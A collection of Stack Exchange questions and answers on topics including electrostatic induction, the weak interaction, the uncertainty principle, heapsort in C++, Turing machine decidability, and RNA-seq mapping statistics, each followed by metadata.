Question: When charging a sphere by induction using a (-) charged object, we put it near the right side of the sphere; electrons are pushed to the left side, so we ground the left side and the excess electrons escape. But what if we grounded the right side (which has fewer electrons than usual)? Wouldn't electrons flow from the ground to neutralise this side? Answer: While you keep the (-) charged object near the sphere, the electrons that'll flow from ground to neutralise the right side will also get pushed towards the left side, though the proportion might vary. That's what I thought. But here's another argument: if the (-) charged object can push incoming electrons from the ground to the left side of the sphere, it can also push them down to the ground, i.e. it will never let the ground donate electrons to the sphere via the right side, due to electrostatic repulsion. Answer: No, nothing will happen if you try to ground the right side. No neutralization, no -ve charging. I suggest you try this out. It would be a fun experiment.
{ "domain": "physics.stackexchange", "id": 34952, "tags": "electrostatics" }
Would life (as we know it) be possible without the weak interaction?
Question: I understand why the strong interaction is important in everyday life (it holds nuclei together and also allows the fusion reactions that power the Sun) and also why the electromagnetic interaction is important (it holds atoms together, among too many other effects to mention). But while I'm sure that the universe would be profoundly different at the macroscopic level if there were no weak interaction, I can't think of a reason why. (Well, I guess it would be a whole lot harder to persuade the NSF to fund neutrino detection experiments...) The weak force affects the amplitudes of scattering processes that don't involve external neutrinos via virtual effects, but are these important enough to qualitatively change the macroscopic physics? (I guess you need the full "pre-symmetry-breaking" unified electroweak interaction in order to get the Higgs mechanism and give particles mass, but is the weak interaction still qualitatively important after symmetry breaking?) Answer: Thanks everyone for lots of good responses - I'm going to summarize them here for future convenience. It looks like there's no consensus on this issue, but here are some takeaways on two variants of my question: If the weak interaction were to suddenly "turn off" with the universe in its current condition, then solar fusion would stop and we'd all be pretty screwed (although it's not like we'd be instantly blown to bits, like we would if, say, the strong interaction were to suddenly turn off). If the weak interaction had never existed in the first place, then the Universe might have been able to evolve into one closely resembling our own if the baryon/photon ratio were sufficiently low during Big Bang nucleosynthesis. It also might still have the observed strong matter/antimatter abundance asymmetry. But it's controversial whether these initial conditions would have led to sufficient production of heavy elements during supernovas. 
And even if planets with chemical composition similar to Earth's did form, their cores would probably be much colder than Earth's, possibly leading to much less tectonic activity and/or geomagnetic radiation shielding, which could make advanced life less likely to evolve.
{ "domain": "physics.stackexchange", "id": 31486, "tags": "everyday-life, weak-interaction, electroweak" }
What temperature is required to burn pencil lead graphite?
Question: I tried to burn a bunch of 8B pencil lead in a gas flame the other day. None of it actually caught fire, but since it is made of carbon (in the form of graphite) it should burn, as graphite is essentially purified coal. What temperature is required to set it burning, and is extra oxygen required? Answer: You have two problems: 1.) pencil lead graphite is actually a graphite-clay composite. 2.) carbon does not sustain burning easily unless it is held at very high temperatures. Pencil lead will not burn effectively for the first reason, as clay is non-combustible and smothers any fire load. If you did have pure graphite to burn, a simple flame wouldn't be hot enough to combust it. You need to sustain temperatures of around $1000\mathrm{-}2000~^\circ\mathrm{C}$ in order for pure carbon to burn.
{ "domain": "chemistry.stackexchange", "id": 9109, "tags": "heat, combustion" }
From uncertainty to commutation relations
Question: Consider the famous problem of measuring both the position and momentum of an electron. We start with two photographs at different times, then worry about the momentum of the photon, the wavelength of the light, the aperture of the camera etc. We end up with the classical uncertainty relations; well actually a bit more: we have an idea of the signs of the errors (e.g. we know on which side the electron was hit by the photon). Now suppose that we have an idea that the measurements are made by application of SOME operators (not necessarily the standard ones) on a Hilbert space. Can we deduce anything like the canonical commutation relations between position and momentum operators? In other words, is the implication between commutation and order of measurement only one way (the commutation relations are consistent with the measurements), or can we give a limited implication the other way? The interest is with novel quantum systems - if there is an idea how measurement theory works, then is this any guide to the algebra of observables? (As well as being of general historical or philosophical interest in whether quantum theory might have taken another turn using different operator representations.) Answer: The uncertainty principle between two observables is related to their commutator in a general and profound way. The generalized uncertainty principle can be proved quite generally using simple matrix algebra and the Cauchy–Schwarz inequality: I) Suppose we have two Hermitian operators (aka observables) $\hat{A}$ and $\hat{B}$.
The possible results of a measurement are their eigenvalues, and the dispersion in the measurement is: \begin{equation} ({\Delta\hat{A}})^2 = \langle\hat{A}^2\rangle-\langle\hat{A}\rangle^2 \end{equation} We can always choose a new reference system to set $\langle\hat{A}\rangle=0$, so we get: \begin{equation} ({\Delta\hat{A}})^2 = \langle\hat{A}^2\rangle = \int\psi^*\hat{A}^2\psi\, dx =\langle\psi|\hat{A}^2|\psi\rangle \end{equation} And obviously the same holds for $\hat{B}$. II) Using the Cauchy–Schwarz inequality: \begin{equation} \langle\psi|\hat{A}\hat{A}|\psi\rangle\langle\psi|\hat{B}\hat{B}|\psi\rangle \geqslant |\langle\psi|\hat{A}\hat{B}|\psi\rangle|^2 \end{equation} One can immediately obtain: \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant |\langle\psi|\hat{A}\hat{B}|\psi\rangle|^2 \end{equation} III) Now, we can bound the term on the right: \begin{equation} |\langle\psi|\hat{A}\hat{B}|\psi\rangle| \geqslant \big|\mathrm{Im}\big[\langle\psi|\hat{A}\hat{B}|\psi\rangle \big]\big| = \Big|\frac{1}{2i}\big[\langle\psi|\hat{A}\hat{B}|\psi\rangle - \langle\psi|\hat{A}\hat{B}|\psi\rangle^* \big]\Big| \end{equation} where I have used that the modulus of a complex number is at least as large as its imaginary part, and then the fact that if $f= \mathrm{Re}(f)+i\,\mathrm{Im}(f)$ then $\mathrm{Im}(f)=\frac{1}{2i}(f-f^*)$.
IV) Because $\hat{A}$ and $\hat{B}$ are observables, $\langle\psi|\hat{A}\hat{B}|\psi\rangle^*=\langle\psi|(\hat{A}\hat{B})^{\dagger}|\psi\rangle=\langle\psi|\hat{B}\hat{A}|\psi\rangle$. V) Finally, using this result (and squaring the bound from III) we can rewrite the inequality as: \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant \Big|\frac{1}{2i}\big[\langle\psi|\hat{A}\hat{B}|\psi\rangle - \langle\psi|\hat{B}\hat{A}|\psi\rangle \big]\Big|^2 =\Big|\frac{1}{2i}\big[\langle\hat{A}\hat{B}\rangle - \langle\hat{B}\hat{A}\rangle \big]\Big|^2=\Big|\frac{1}{2i}\langle[\hat{A},\hat{B}]\rangle\Big|^2 \end{equation} So the dispersion in any two Hermitian operators is related to their commutator: \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant\Big|\frac{1}{2i}\langle[\hat{A},\hat{B}]\rangle\Big|^2 \end{equation} I suppose that you could measure the dispersion of two observables with increasing accuracy to find some upper limit on their commutator. Note that this works for any two observables you like to use, not just canonical ones like X and P.
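The Robertson inequality derived above can be verified numerically for finite-dimensional observables. A pure-Python sketch with the 2x2 Pauli matrices $\sigma_x$, $\sigma_y$ and an arbitrary real state (any Hermitian pair and any normalized state would do; no external libraries assumed):

```python
import math

def matvec(M, v):
    return [sum(M[i][j] * v[j] for j in range(len(v))) for i in range(len(M))]

def inner(u, v):
    return sum(a.conjugate() * b for a, b in zip(u, v))

def expect(M, psi):
    return inner(psi, matvec(M, psi)).real

def variance(M, psi):
    # (Delta M)^2 = <M^2> - <M>^2
    M2v = matvec(M, matvec(M, psi))
    return inner(psi, M2v).real - expect(M, psi) ** 2

def commutator_expect(A, B, psi):
    # <psi| [A, B] |psi>
    ABv = matvec(A, matvec(B, psi))
    BAv = matvec(B, matvec(A, psi))
    return inner(psi, [a - b for a, b in zip(ABv, BAv)])

# Pauli matrices and a normalized state
sx = [[0, 1], [1, 0]]
sy = [[0, -1j], [1j, 0]]
theta = 0.7
psi = [math.cos(theta), math.sin(theta)]

lhs = variance(sx, psi) * variance(sy, psi)
rhs = abs(commutator_expect(sx, sy, psi) / 2j) ** 2
# Robertson bound: lhs >= rhs; for this real state the bound is in fact
# saturated, since [sx, sy] = 2i*sz gives rhs = cos(2*theta)^2 = lhs.
```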
{ "domain": "physics.stackexchange", "id": 39838, "tags": "quantum-mechanics, heisenberg-uncertainty-principle, measurement-problem, commutator, observables" }
Maxwell equations
Question: $$\oint \vec{B}\cdot d\vec{l} = \mu_0\left(I+\epsilon_0\frac{\partial\Phi_E}{\partial t}\right)$$ Please explain the applications and implications of the modified Ampère's circuital law with Maxwell's addition, especially the significance of Maxwell's work. Answer: See my answer here: Maxwell's big contribution was the notion of displacement current, which then changed the equations of electromagnetism in a way that foretold electromagnetic radiation, whereby the Cartesian components of the fields all fulfil d'Alembert's wave equation and, moreover, the wavespeed $c$ is $c = 1/\sqrt{\mu_0\,\epsilon_0}$. The latter's ($c$, that is) surprising nearness to the experimentally known value as found by the Fizeau experiment led Maxwell to assert that light is one such electromagnetic wave. Historians of physics widely consider that Maxwell's foretelling was first vindicated by the Hertz spark-gap experiment. So, without being too glib, the great J C Maxwell's main gig was the second term on the right-hand side of your equation.
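The numerical coincidence Maxwell noticed is easy to reproduce (a sketch; the constants below are modern SI values, my assumption rather than figures from the answer):

```python
import math

mu0 = 4 * math.pi * 1e-7    # vacuum permeability in H/m
eps0 = 8.8541878128e-12     # vacuum permittivity in F/m

# Maxwell's prediction for the wavespeed of electromagnetic radiation
c = 1 / math.sqrt(mu0 * eps0)
print(c)                    # ~2.998e8 m/s, matching the measured speed of light
```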
{ "domain": "physics.stackexchange", "id": 14366, "tags": "electromagnetism, maxwell-equations" }
Are elementary particles ultimate fate of black holes?
Question: From the "no hair theorem" we know that black holes have only 3 characteristic external observables, mass, electric charge and angular momentum (except the possible exceptions in the higher dimensional theories). These make them very similar to elementary particles. One question naively comes to mind. Is it possible that elementary particles are ultimate nuggets of the final stages of black holes after emitting all the Hawking radiation it could? Answer: This is indeed a tempting suggestion (see also this paper). However, there is a crucial difference between elementary particles and macroscopic black holes: the latter are described, to a good approximation, by non-quantum (aka classical) physics, while elementary particles are described by quantum physics. The reason for this is simple. If the classical radius of an object is larger than its Compton wavelength, then a classical description is sufficient. For black holes whose Schwarzschild radius is bigger than the Planck length this is fulfilled. However, for elementary particles this is not fulfilled (e.g. for an electron the "radius" would refer to the classical electron radius, which is about $10^{-13}$cm, whereas its Compton wavelength is about three orders of magnitude larger). Near the Planck scale your intuition is probably correct, and there is no fundamental difference between black holes and elementary particles - both could be described by certain string excitations.
{ "domain": "physics.stackexchange", "id": 574, "tags": "general-relativity, particle-physics, black-holes" }
Heapsort is not modular
Question: For the time being, I am not interested in any recursive solution. The code is not modularized; the whole body is inside the main function.

#include<iostream.h>
#include<stdlib.h>
/*This code is written by NF between any time of 120711 and 210711;modified at 231211*/
int main()
{
    int length=0,min_heapified=0,start_length=0,index=0;
    cout<<"Enter Array Length:";
    cin>>length;
    int array[length];
    for(int i=0;i<length;i++)
    {
        array[i]=rand()%100;
    }
    cout<<"Array is filled now with random elements";
    cout<<"\nSorted Array:"<<endl;
    do
    {
        do
        {
            min_heapified=0;
            for(int root=0;root<length/2;root++)/*As the leaf nodes have no child they should not be in a consideration while swapping so looping upto length/2 is enough*/
            {
                int left=((2*root)+1);
                int right=((2*root)+2);
                if(left<length)
                {
                    if(array[left]<array[root])
                    {
                        int swap=array[left];
                        array[left]=array[root];
                        array[root]=swap;
                        min_heapified=1;
                    }
                }
                if(right<length)
                {
                    if(array[right]<array[root])
                    {
                        int swap=array[right];
                        array[right]=array[root];
                        array[root]=swap;
                        min_heapified=1;
                    }
                }
            }
        }while(min_heapified>0);
        int swap=array[0];
        array[0]=array[--length];/*modification done at this point to avoid keeping the sorted elements into another array;and swapping done between the 0th and last element*/
        array[length]=swap;
        cout<<array[length]<<" ";
    }while(length>0);
    return 0;
}

Answer: The other answers cover the stylistic concerns of your code pretty well already. However, there is still one major issue with your code that warrants another (albeit late) answer: it's incorrectly implemented! The "heapsort" algorithm that you implemented has a run-time complexity of O(N²). Judging from your comment, you probably realized something was wrong too since the run-time sky-rocketed as you tried to sort more items. Here are the problem areas I see that are causing the abysmal performance: You are re-heapifying the entire array on each iteration.
This is of course completely wrong and it's the biggest reason why your code is performing so poorly. You're only supposed to heapify the array once, at the beginning when you start the sort. Shifting all the elements down by one after removing the smallest. This is an O(N) operation that can be avoided altogether with a redesign. Use of a temp array -- this is also unnecessary. Like quicksort, one of heapsort's advantages is that it's capable of sorting in-place without the need to allocate a temporary buffer. Heapifying 'leaf' elements needlessly. By definition, leaf elements don't have any child nodes below them so there's nothing to push down. Therefore, it doesn't make sense to heapify past the last parent element. In other words, you should be going from root = 0 to root < (length / 2). Going past length / 2 will just result in unnecessary comparisons: left < length and right < length will always be false. It's typical to write 2 helper functions when implementing heapsort: heapify that turns the array into a heap, and a push_down or filter_down function to enforce the heap property for the element passed in. You usually implement heapify with the help of the filter function. Note that the STL has heap functions that do exactly those tasks: push_heap, pop_heap and make_heap. I'll leave the utility functions for you to figure out but here's how the top view of heapsort should look:

void heapsort(int *begin, int *end)
{
    // assume end is one past the last element, e.g. array + length
    heapify(begin, end);
    while(begin != --end)
    {
        swap(*begin, *end);
        // invariant: the next item to order will be at the top
        // after the swap, the next biggest/smallest item may not be
        // at the top. use push_down to fix this and preserve the heap property.
        push_down(begin, end);
    }
}

Note that you do not call heapify inside the loop. After the swap, only the top element might violate the heap property -- the rest of the remaining elements are still in a heap.
To fix the top you just need to push_down that element until it reaches the right level. This can be done in O(log n) since that's how deep the tree can ever be. Edit: Added more explanation and example. An analogy might help clear up the idea behind heapsort. You can think of heapsort as hosting an elimination tournament where in each match-up bracket 3 contenders duke it out. The winner will move up the bracket to the next match-up and the 2 losers stay where they are. The tournament starts out by doing all the match-ups at the bottom bracket first, progressively moving up -- this is basically the heapifying phrase. After you heapify, that's finishing one entire tournament -- the champion is at array[0] and the runner-ups will be either array[1] or array[2]. To find the runner-up you host another match-up between them plus a 3rd contender from the bottom bracket. Now if you think of 'push_down' as a sort of scorekeeper, his job is to keep track of the winners and move them up the bracket + what match-ups need to take place. Each match-up has 1 'defender' (the guy one bracket up) and 2 'challengers'. If the defender loses, he swaps places with the challenger that defeated him. If there are more challengers below the defender's new spot, another match-up is between them. The defender will get pushed further and further down the match-up bracket until he can successfully defend his spot or there are no more opponents to defend against. The 'push_down' function is probably the most important helper since that's where the reordering actually happens. It's almost analogous to partition in qsort or merge in mergesort. Here's basically what the push_down function would look like: (note, it's not thoroughly tested)

void push_down(int *begin, int *end, size_t defender = 0)
{
    // at the very bottom?
    if(defender >= std::distance(begin, end) / 2)
        return;

    size_t challenger = defender * 2 + 1;

    // is there a right-child?
    // Note that in even# arrays, last parent doesn't have a right child
    if(begin + challenger + 1 != end)
        if(begin[challenger + 1] < begin[challenger])
            ++challenger;

    // defended successfully?
    if( !(begin[challenger] < begin[defender]) )
        return;

    // challenger wins
    std::swap(begin[challenger], begin[defender]);
    push_down(begin, end, challenger);
}

Note that the array will be sorted in descending order if smallest is at the top. But this is trivial to fix once sorting is working -- just flip the comparison being done. You should heed the advice from the other answers and extract out those functions. It will make your code easier to reason about.
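The same top-level design (heapify once up front, then repeatedly swap the top with the end and push_down the new top) can be sketched in runnable form; this is my Python translation of the outline above, not the original C++. As in the answer, a min-heap at the top yields a descending sort:

```python
def push_down(a, end, defender=0):
    """Restore the min-heap property for a[defender] within a[:end]."""
    while defender < end // 2:                 # leaves need no fixing
        challenger = 2 * defender + 1          # left child
        if challenger + 1 < end and a[challenger + 1] < a[challenger]:
            challenger += 1                    # right child is smaller
        if not a[challenger] < a[defender]:
            return                             # defended successfully
        a[challenger], a[defender] = a[defender], a[challenger]
        defender = challenger

def heapsort(a):
    n = len(a)
    for i in range(n // 2 - 1, -1, -1):        # heapify: done once, up front
        push_down(a, n, i)
    for end in range(n - 1, 0, -1):
        a[0], a[end] = a[end], a[0]            # smallest element goes to the back
        push_down(a, end)                      # fix only the new top, O(log n)
    # min-heap at the top => the array ends up in descending order
```

Flipping the `<` comparisons (a max-heap) would give the ascending order instead, exactly as the answer notes.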
{ "domain": "codereview.stackexchange", "id": 13415, "tags": "c++, algorithm, sorting" }
Products of the reaction between chromium(III) chloride, zinc and sulfuric acid
Question: The aim of my experiment was to make a Cr(II) aquacomplex in situ, and for that I have the reaction: $$\ce{CrCl3·6H2O + Zn}$$ and I add concentrated sulfuric acid to it. I know that chromium(III) reduces to chromium(II), but I'm not sure about the reaction. Would it be $$\ce{CrCl3·6H2O + Zn -> Cr(H2O)6Cl2 + ZnCl + H2}?$$ Answer: I know that chromium(III) reduces to chromium(II), but I'm not sure about the reaction. Would it be $$\ce{CrCl3·6H2O + Zn -> Cr(H2O)6Cl2 + ZnCl + H2}?$$ Your concept is right and I am glad nobody taught you the concept of nascent hydrogen. It is an obsolete idea of the 1920-40s. Please don't use it anywhere. Wikipedia has a nice summary https://en.wikipedia.org/wiki/Nascent_hydrogen and of course there are several articles which negate this very concept. You can just simply write the ionic equation involving Cr(III) and Zn, resulting in Cr(II) and Zn(II). Hydrogen is just a side-product, which is not participating in the reaction. Write the conditions over the arrow. Alternatively, write the aquated forms as a complex. Your current equation has an incorrect formula for the zinc salt. Check what it should be!
{ "domain": "chemistry.stackexchange", "id": 12193, "tags": "inorganic-chemistry, aqueous-solution, coordination-compounds, transition-metals" }
Parsing data from a string
Question: I think this is something that experienced programmers do all the time. But, given my limited programming experience, please bear with me. I have an excel file which has particular cell entries that read [[{"from": "4", "response": true, "value": 20}, {"from": "8", "response": true, "value": 20}, {"from": "9", "response": true, "value": 20}, {"from": "3", "response": true, "value": 20}], [{"from": "14", "response": false, "value": 20}, {"from": "15", "response": true, "value": 20}, {"from": "17", "response": false, "value": 20}, {"from": "13", "response": true, "value": 20}]] Now, for each such entry I want to take the information in each of the curly brackets and make a row of data out of it. Each such row would have 3 columns. For example, the row formed from the first entry within curly brackets should have the entries "4", "true" and "20" respectively. The part I posted should give me 8 such rows, and for n such repetitions I should end up with a matrix of 8n rows and 4 columns (an identifier, plus the 3 columns mentioned). What would be the most efficient way to do this? By "doing this" I mean learning the trick, and then implementing it. I have access to quite a few software packages (Excel, Stata, Matlab, R) in my laboratory, so that should not be an issue. Answer: If you have R it is quite simple. Copy the lines into a file, let's say "mydata.json". Be sure you have installed the rjson package: install.packages("rjson") Import your data:
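Python was not on the asker's list of packages, but if it happens to be available too, the flattening step is a few lines with the standard json module (a sketch on a shortened, hypothetical version of the sample cell; the outer list index serves as the identifier column):

```python
import json

# a shortened stand-in for the cell contents quoted in the question
cell = '''[[{"from": "4", "response": true, "value": 20},
            {"from": "8", "response": true, "value": 20}],
           [{"from": "14", "response": false, "value": 20},
            {"from": "15", "response": true, "value": 20}]]'''

rows = []
for group_id, group in enumerate(json.loads(cell)):
    for entry in group:
        # identifier column plus the three fields of each {...} entry
        rows.append((group_id, entry["from"], entry["response"], entry["value"]))

print(rows[0])   # first entry becomes the row (0, '4', True, 20)
```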
{ "domain": "datascience.stackexchange", "id": 154, "tags": "parsing" }
Turing machine and language decidability
Question: The document I am reading is here: Turing Machines Before getting into the question, here is the notation used on the picture: Here $\Delta$ denotes the blank and R, L and S denote move the head right, left and do not move it, respectively. A transition diagram can also be drawn for a Turing machine. The states are represented by vertices and for a transition $\delta( q, X ) = ( r, Y, D )$, where D represents R, L or S, an arc from q to r is drawn with label ( X/Y , D ) indicating that the state is changed from q to r, the symbol X currently being read is changed to Y and the tape head is moved as directed by D. According to the document: A Turing machine T is said to decide a language L if and only if T writes "yes" and halts if a string is in L and T writes "no" and halts if a string is not in L Here are the three examples: Case 1: Case 2: Case 3: I just want to verify my understanding. According to the definition, in case 1 and case 2, the Turing machines cannot decide because they cannot tell whether inputs other than { a } (such as aa, aaa, aaaa, ...) are in L or not. In case 2, if another a appears after the first a, or if the input is empty, the machine goes to state S and loops forever. In case 3, if a is detected and only a single a exists, that a is replaced by 1 and the machine accepts. Otherwise, a 0 is written and the input is decided not to be in the language. Am I correct on all of these? However, in case 3, what if I give an input which contains a character other than a (such as the string ab or bc)? Or does a TM decide only languages over the alphabet $\Sigma$ allowed by the Turing machine? If a string is longer than a single a (like aa, aaa, ab, bc, ...), the machine may loop forever (like in case 2) or halt without accepting (in other words, it "crashes": it does not have a transition rule for a symbol in the input, such as b in the case of the above Turing machines). Is this correct also?
Answer: A TM decides a language if it enters the accepting state for words in the language and it enters the rejecting state for words that are not. Thus it halts on all inputs. Note the machines defined above are not entirely standard. The way they denote acceptance and rejection is by writing a $1$ or $0$ and then entering a halting state. This is equivalent to the standard definition, but less elegant. Machine 1 does not reject words not in the language. It only accepts the language. Machine 2 does not halt for words not in the language. It only accepts the language. Machine 3 rejects and hence halts for words not in the language, therefore it decides the language.
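The behaviour discussed for case 3 can be mimicked with a small table-driven simulator (a sketch; the state names, the blank symbol and the crash-means-no-acceptance convention are my own choices, not taken from the linked document):

```python
# A tiny simulator for the third machine's behaviour: decide L = {a}.
# Transitions: delta[(state, symbol)] = (new_state, symbol_to_write, head_move)
BLANK = "_"
delta = {
    ("q0", "a"): ("q1", "a", 1),      # saw one 'a', check nothing follows
    ("q0", BLANK): ("no", "0", 0),    # empty input: write 0, reject
    ("q1", BLANK): ("yes", "1", 0),   # exactly one 'a': write 1, accept
    ("q1", "a"): ("no", "0", 0),      # a second 'a': write 0, reject
}

def run(word, max_steps=100):
    tape = dict(enumerate(word))
    state, head = "q0", 0
    for _ in range(max_steps):
        if state in ("yes", "no"):
            return state == "yes"
        key = (state, tape.get(head, BLANK))
        if key not in delta:          # no rule for this symbol: it "crashes"
            return False
        state, tape[head], move = delta[key]
        head += move
    return None                       # did not halt within the step budget
```

Inputs containing a symbol with no transition rule (e.g. "ab") fall into the crash branch and are not accepted, matching the discussion in the question.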
{ "domain": "cs.stackexchange", "id": 273, "tags": "computability, turing-machines" }
Why $e$ in the formula for air density?
Question: I am reading a book that says that the density of air is approximately $D = 1.25 e^{(-0.0001h)}$, where h is the height in meters. Why is Euler's number $e$ used here? Was a differential equation used in deriving this formula? Answer: It's actually a surprisingly straightforward differential equation. If you assume that the acceleration due to gravity $g$ doesn't change with altitude (a good approximation if the atmosphere is thin compared to the radius of the earth), Bernoulli's relation tells you the change in the pressure $P$ with height $h$: $$ \frac{dP}{dh} = -\rho g$$ Meanwhile the pressure and the density are also related by the ideal gas law $$ PV = NRT $$ or $$ P = \rho \frac{RT}{M} $$ where $M$ is the mass of one mole of the gas. If you're willing to neglect the changes in temperature $T$ and mean molar mass $M$, you can differentiate with respect to height and find \begin{align} \frac{dP}{dh} = \frac{d\rho}{dh} \frac{RT}M &= -\rho g \\ \frac{d\rho}{dh} &= -\rho \frac{gM}{RT} = -\frac{\rho}{h_0} \end{align} This is the classic differential equation for an exponential. If I use nice round numbers $R=8\,\mathrm{\frac{J}{mol\cdot K}}$, $T=300\,\mathrm K$, $M=30\,\mathrm{g/mol}$, $g=10\,\mathrm{m/s^2}$, I get a scale height of 8000 meters, different from your textbook's approximation of $10^4$ meters by about 20%.
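Plugging the answer's round numbers into the scale-height expression reproduces the 8000 m figure (a quick sketch; the constants are copied from the answer, and the 1.25 surface density is the book's prefactor):

```python
import math

# round numbers from the answer
R = 8.0       # J/(mol K)
T = 300.0     # K
M = 0.030     # kg/mol (30 g/mol)
g = 10.0      # m/s^2

h0 = R * T / (g * M)     # scale height h0 = RT/(gM)
print(h0)                # ~8000 m

def density(h, rho0=1.25):
    """Solution of d(rho)/dh = -rho/h0, the book's rho0 * exp(-h/h0) form."""
    return rho0 * math.exp(-h / h0)
```

With $h_0 = 8000\,\mathrm{m}$ the exponent is $-h/8000 \approx -0.000125\,h$, close to the book's $-0.0001\,h$, consistent with the answer's remark about a ~20% difference.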
{ "domain": "physics.stackexchange", "id": 14617, "tags": "air, atmospheric-science, density" }
Drawing a regression line with a timeseries
Question: My code is using seaborn to draw a regression line with a timeseries data as the x axis, and whatever you want the y-axis to be. Since seaborn does not support this function directly, a dummy column has to be made first based on the timeseries (i.e. instead of using 2016-05-01, use 1, 2, 3, 4, 5... to represent the date). Then, plot the regression line using 1, 2, 3... as the x-axis and replace the 1, 2, 3 labels with 2016-05-01, 2016-05-02...

def regplot_timeseries(df: pd.DataFrame, time_col: str, data_col: str,
                       figsize=(14, 6), xlabel='', ylabel=''):
    # make a copy of the incoming data (think of the incoming data as an excel sheet visually)
    dfc = df.copy()

    # if it is an index, treat it slightly differently
    # add a column to the copy of the excel sheet for plotting purposes
    if time_col == 'index':
        dfc = dfc.sort_index()
        dfc['date_f'] = pd.factorize(dfc.index)[0] + 1
        mapping = dict(zip(dfc['date_f'], dfc.index.date))
    else:
        dfc = dfc.sort_values(time_col)
        dfc['date_f'] = pd.factorize(dfc[time_col])[0] + 1
        mapping = dict(zip(dfc['date_f'], dfc[time_col].dt.date))

    # plotting
    fig, ax = plt.subplots()
    fig.set_size_inches(figsize[0], figsize[1])
    sns.regplot('date_f', data_col, data=dfc, ax=ax)
    labels = pd.Series(ax.get_xticks()).map(mapping).fillna('')
    ax.set_xticklabels(labels)
    ax.set_xlabel(xlabel)
    ax.set_ylabel(ylabel)

    # delete the copy to free up memory
    del dfc

I am new to functional programming, and from what I read, I shouldn't alter the data being passed in. In this case, I shouldn't alter df, so I made a copy instead and deleted the copy at the end of the function. Is this the right way to do it? Answer: You don't need dfc: dfc.sort_index() and dfc.sort_values(time_col) both make a copy of the data. They don't perform an in-place sort. del dfc isn't needed, Python will perform that action at the end of the function anyway. Also I don't think it's doing what you think it's doing.
I may be wrong, but since variables in Python are like names, when you're using del, you're just removing one name tag from the object. Deletion of a name removes the binding of that name from the local or global namespace, depending on whether the name occurs in a global statement in the same code block. In my personal opinion, Python doesn't lend itself well to functional programming. Yes you can do FP in it, but it tends to start looking very ugly very fast. Don't worry about whether something is FP or not, just make it work. I don't really know what your code is doing, but the if-else and the 'plotting' should probably be in two separate functions.
{ "domain": "codereview.stackexchange", "id": 25940, "tags": "python, functional-programming, pandas, data-visualization" }
Mapping statistics from bam file using bbtools and sambamba
Question: Below are the statistics for RNA-seq mapped and unmapped paired-end reads mapped to the rice genome using reformat.sh from bbtools on bam files. It gives 77% mapped and 5% unmapped; what about the remaining 18% of reads? How can I get information for all reads?

Command:
reformat.sh in=Leaf_T1_F_R10_S1_L001.bam out=Leaf_T1_F_R10_S1_L001.mapped.bam, mappedonly

Unspecified format for output Leaf_T1_F_R10_S1_L001.mapped.bam,; defaulting to fastq.
Found sambamba.
Input is being processed as unpaired
Input: 67471075 reads 9312399845 bases
Output: 52020538 reads (77.10%) 7208830835 bases (77.41%)
Time: 171.212 seconds.
Reads Processed: 67471k 394.08k reads/sec
Bases Processed: 9312m 54.39m bases/sec

For unmapped reads; Command:
reformat.sh in=Leaf_T1_F_R10_S1_L001.bam out=Leaf_T1_F_R10_S1_L001.unmapped.bam, unmappedonly

Unspecified format for output Leaf_T1_F_R10_S1_L001.unmapped.bam,; defaulting to fastq.
Found sambamba.
Input is being processed as unpaired
Input: 67471075 reads 9312399845 bases
Output: 3435326 reads (5.09%) 465456267 bases (5.00%)
Time: 142.978 seconds.
Reads Processed: 67471k 471.90k reads/sec
Bases Processed: 9312m 65.13m bases/sec

With sambamba; Can I say 94.91% of reads are mapped and 5.09% are unmapped?

67471075 + 0 in total (QC-passed reads + QC-failed reads)
12015211 + 0 secondary
0 + 0 supplementary
0 + 0 duplicates
64035749 + 0 mapped (94.91%:N/A)
55455864 + 0 paired in sequencing
27727932 + 0 read1
27727932 + 0 read2
51006046 + 0 properly paired (91.98%:N/A)
51419222 + 0 with itself and mate mapped
601316 + 0 singletons (1.08%:N/A)
263816 + 0 with mate mapped to a different chr
237111 + 0 with mate mapped to a different chr (mapQ>=5)

Answer: Try samtools flagstat or sambamba flagstat to get a similar type of information about your bam file. It may be easier to interpret. Both of these tools can be installed using conda if needed.
EDIT: Yes, the results of sambamba flagstat you showed in your edited post indicate exactly what you said: 94.91% mapped and 100% - 94.91% = 5.09% unmapped: 64035749 + 0 mapped (94.91%:N/A)
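The percentages in the flagstat output are straightforward to verify from the raw counts (a quick check; the numbers are copied from the report above, and note that, like flagstat, the total counts secondary alignments as records):

```python
total = 67471075     # total records from the flagstat report
mapped = 64035749    # "mapped" line from the flagstat report

mapped_pct = 100 * mapped / total
unmapped_pct = 100 - mapped_pct
print(round(mapped_pct, 2), round(unmapped_pct, 2))   # 94.91 5.09
```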
{ "domain": "bioinformatics.stackexchange", "id": 1575, "tags": "rna-seq, samtools, bash, java, sambamba" }
Slit screen and wave-particle duality
Question: In a double-slit experiment, interference patterns are shown when light passes through the slits and illuminates the screen. So the question is, if one shoots a single photon, does the screen show an interference pattern? Or does the screen show only the one location that the single photon particle is at? Answer: The answer is yes to both questions: yes, the screen does show one location for one particle, and yes, the accumulated picture after repeating the experiment many, many times does show the interference pattern. There is a set of beautiful pictures and a video of the double-slit experiment in one-particle-at-a-time mode that can be found here (the experiment is with electrons but conceptually there is no difference).
{ "domain": "physics.stackexchange", "id": 4615, "tags": "quantum-mechanics, photons, double-slit-experiment, wave-particle-duality" }
Is this basic gene diagram correctly labeled?
Question: I keep seeing this gene diagram, and I am not sure how to interpret it. I don't know what this diagram is called or where it was first depicted, but in the second picture, I have labeled it with what I think are the correct regions. Unlabeled Labeled If the labels are correct, does this mean that an open reading frame (and consequently, the CDS) does not have to begin at exon 1? If the labels are not correct, could you make some suggestions on how to fix the mistakes or point me towards some resource for interpreting this diagram? Answer: My professor got back to me and said my diagram is correct -- and that allows me to answer my second question: an ORF does not have to begin in the first exon. (The UCSC Genome Browser uses a similar format to display genes.)
{ "domain": "biology.stackexchange", "id": 10672, "tags": "genetics, dna, proteins, dna-sequencing, genomics" }
Instantaneous speed x instantaneous velocity
